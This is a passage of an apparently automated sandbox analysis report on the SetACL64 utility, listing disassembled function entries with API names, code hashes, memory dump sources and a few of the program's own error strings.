                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: try_get_function
                                        • String ID: AppPolicyGetThreadInitializationType
                                        • API String ID: 2742660187-3350320272
                                        • Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                        • Instruction ID: 3d5049713480d79797d430cb7c001c16d8387c7092c3090dead06f373b8f59ba
                                        • Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                        • Instruction Fuzzy Hash: 9DE04FD1F0A906D2FA0547A1A8002B01211BF5C375E48533ADA3D863E0DF3D9D99C7A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: FileHandleType
                                        • String ID:
                                        • API String ID: 3000768030-0
                                        • Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                        • Instruction ID: f57ff143fa14e4c43c3edc97beefe5292a639e98ac51d7b5c2769795bae89b82
                                        • Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                        • Instruction Fuzzy Hash: 6231A8A2B18B46C1D7648B1585902796660FF55BB0F68133DDBAE8B3E0CF3AEC61D311
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread
                                        • String ID:
                                        • API String ID: 1611280651-0
                                        • Opcode ID: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                        • Instruction ID: eee4f88e28d12b9f033adee4818bec0d59c88257f9bae10bdfff2733100dfb95
                                        • Opcode Fuzzy Hash: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                        • Instruction Fuzzy Hash: D4F03091B5A746C7EF14AB70945D1BC12A1BF95B10F044438DA0DC23A3EF2EAD44C321
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73b8ed42e088179a605e82527c2fbd6198f734ef61ae8345c81d4f4b167e78b3
                                        • Instruction ID: 80e5e4174346c48fe5c0553c943e5658a157202bbd4ae169810aacc4425d44c4
                                        • Opcode Fuzzy Hash: 73b8ed42e088179a605e82527c2fbd6198f734ef61ae8345c81d4f4b167e78b3
                                        • Instruction Fuzzy Hash: 1C816B62A08B81C6E621DF65A4402B977B0FF94B84F009639DF8EA7752DF39E985C350
                                        APIs
                                        • TlsFree.KERNELBASE(?,?,?,00007FF6868733F9,?,?,?,00007FF68687371D,?,?,?,?,?,?,00007FF686872F93), ref: 00007FF686873645
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Free
                                        • String ID:
                                        • API String ID: 3978063606-0
                                        • Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                        • Instruction ID: b8b61ec74d821a87000d217d790c73e0836dc1d416991b08099c6faeab6b2472
                                        • Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                        • Instruction Fuzzy Hash: F7318A62B04B45C2AA108F16E49016973A0BB58FE4F58963ADF6D473A4DF3ED892C341
                                        APIs
                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF68686E258
                                          • Part of subcall function 00007FF68686892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF686868935
                                          • Part of subcall function 00007FF68686892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF68686895A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4036615347-0
                                        • Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                        • Instruction ID: bf4db36ab8db133c3625cef79371c971184b857da00d89c3ff60e1485532c1a3
                                        • Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                        • Instruction Fuzzy Hash: A6215EA1A1D753C3FA149B55A51D2396692BF49B90F044538EF5C8BBD6DE3EDC01C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressFreeLibraryProc
                                        • String ID:
                                        • API String ID: 3947729631-0
                                        • Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                        • Instruction ID: 94ee3ddd6467598df2a39a9baec7dc7bd2d120d9e6827edde55d2aa933dde64d
                                        • Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                        • Instruction Fuzzy Hash: DB214C72F04B01CBEB11CF64D4856AD37B0FB44708F44853AD61D82A95DF3AE985CBA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                        • Instruction ID: 2f52407cdd96bf38970160a7579e3ac7f68a84356c3e245f93e19437267f14fa
                                        • Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                        • Instruction Fuzzy Hash: 36116DB2A2CA82C2F3109B54A44416962A6FF44784F45413DD6ADCB796DF3EFC52CB20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                        • Instruction ID: 0ec6077fb622112607799563dc8b4647506713909478994994e2a58229cb843e
                                        • Opcode Fuzzy Hash: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                        • Instruction Fuzzy Hash: 6C1103B2A14B56DDEB10DFA0D4852EC37B8FB0835CF50052AEA4D56B5AEF34C594C3A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                        • Instruction ID: 0de441a8dc903061041f098eff5ced888e57baab513c5e1a69160b0d1d7128b2
                                        • Opcode Fuzzy Hash: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                        • Instruction Fuzzy Hash: 4A11DFB2A15F56D9EB10CFA0E8840DC37B8FB1839CB50062AEB5D52B59EF34C5A5C790
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                        • Instruction ID: 5f9963cd24ac20c6b3fda86a4fa83f562118f959bc08396f7abd13f5810a5293
                                        • Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                                        • Instruction Fuzzy Hash: CAF037B1D59586CAFB51E714E8653B533A0FF99744F80043AC64DC62A1DE2FE905CF60
                                        APIs
                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF68687403D,?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686875031
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                        • Instruction ID: 97cab12895228fb44d477477ac194cf0582216144f7e1b0b87bfac3839b0d34e
                                        • Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                        • Instruction Fuzzy Hash: 0CF090D0B19207C2FF6657A698153B502A17F88B84F4C513CC90EC67D1ED6EEC81C272
                                        APIs
                                        • HeapAlloc.KERNEL32(?,?,?,00007FF68687BCE1,?,?,00000000,00007FF68687D70B,?,?,?,00007FF6868734C7,?,?,?,00007FF6868733BD), ref: 00007FF6868750D2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                        • Instruction ID: 775769313d7560ac7fc501f500eafdddfeb87613615633c595624100f7eb1872
                                        • Opcode Fuzzy Hash: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                        • Instruction Fuzzy Hash: D0F08290B0D307C6FF256762580527411A17F447A8F188338DD2EC62C6DD2EEC81C272
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                        • Instruction ID: 678695c2bb4fff7f16deece579002792e3f0b85fb940d855dec450c5c7193d32
                                        • Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                        • Instruction Fuzzy Hash: 52A1E6A2B18685C5EA60CB2694047BAA3B0FF94BD4F54413AEE5D87B94DF3ED845C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
                                        • String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
                                        • API String ID: 1165008562-2181592180
                                        • Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                        • Instruction ID: 404cbae69a388cced9087b609e9ddc220526397fc3701baf575379e0d3a99ea1
                                        • Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                        • Instruction Fuzzy Hash: 8071C9B1A69783C1EA009B64D0887AD6321FF857A4F401539E75D876FADFBEE840C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$EventMutexReleaseReset
                                        • String ID:
                                        • API String ID: 4195719913-0
                                        • Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                        • Instruction ID: 6ffc553d7a659dbefa639c0182d432df865ea05768376e4391a8cd2db22c07c5
                                        • Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                        • Instruction Fuzzy Hash: 3BB17FB2A18BC1C5EB208F25D9583ED2361FF48798F414639DA6C8B7E5DF399980C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
                                        • String ID: bad locale name
                                        • API String ID: 249287498-1405518554
                                        • Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                        • Instruction ID: 0362ff50ef98fb21abde8038824d2edfecb0dcd294d6f109a18a45e4b1812ec6
                                        • Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                        • Instruction Fuzzy Hash: 7F718DA2B19A81C9FB15DF65D9502BC3364FF54744F080039DF8DA3A96DE3AE952C324
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Valid$DeleteEqualInformation
                                        • String ID:
                                        • API String ID: 439278688-0
                                        • Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                        • Instruction ID: 344a6eff489a6a41200e9fdbeae6a458f7b893de6cad95c91f516e73a36f76fd
                                        • Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                        • Instruction Fuzzy Hash: CE816BA1A0C6C6CAEE618B26954937967A1FF84B84F080439DA4ED7791DF3EEC50C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$LoadString
                                        • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                                        • API String ID: 498717675-3876775778
                                        • Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                        • Instruction ID: cacafaff8aef16aef4453ca37b0079115f82df94c3156b3a4bae7fc55b23598f
                                        • Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                        • Instruction Fuzzy Hash: 0E81B9A2A59BC6C5EB209F34D8443ED2361FF45788F809139D74C9B656DF6EDA84C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
                                        • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
                                        • API String ID: 1697026759-531884627
                                        • Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                        • Instruction ID: 58278bfdf5c43c6d90a3c635f062df40a94726280256f7dbfa058458c7548064
                                        • Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                        • Instruction Fuzzy Hash: CDD14CB2618B81C6DB10DF15F4802AEB7A5FB88B84F50412AEB8D87B68DF7DD545CB10
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
